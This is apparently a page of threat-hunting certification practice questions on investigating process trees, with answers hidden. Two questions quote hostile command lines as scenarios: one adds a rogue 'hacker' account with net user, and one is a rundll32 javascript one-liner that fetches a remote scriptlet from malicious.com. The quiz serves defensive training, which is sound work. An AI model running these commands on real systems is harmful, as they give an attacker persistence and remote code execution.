
CrowdStrikeCertified Falcon Hunter (CCFH)
Domain 7Objective 5
7.5 Investigate a Process Tree CCFH Practice Questions (Page 4)
Part of the Hunting Methodology domain, which makes up ~17% of our current practice bank.
24questions here
5free pages
4concepts
Questions 16–20
- 16
In a process tree, which process is considered the parent of a newly spawned process?
Select an answer first - 17
You are investigating a process tree where 'svchost.exe' is the parent of 'msiexec.exe', which then spawned 'cmd.exe' with the command line 'cmd.exe /c net user hacker P@ssw0rd /add'. The host is a file server that has been flagged for unusual outbound connections. Which correlation would be most useful to determine if this is a false positive?
Select an answer first - 18
You are analyzing a process tree where a legitimate-looking process 'svchost.exe' has spawned an unusual child process 'powershell.exe' with the argument '-enc ...'. To confirm if this is malicious, which additional data source would provide the most valuable context?
Select an answer first - 19
During a hunt, you observe a process tree where 'winword.exe' is the parent of 'powershell.exe', which then spawned 'rundll32.exe' with the command line 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://malicious.com/payload.sct")'. What is the most likely intent of this process tree?
Select an answer first - 20
In a process tree investigation, what is the first step to trace the origin of a suspicious process?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by CrowdStrike. “CCFH” is a trademark of its owner, used for identification only.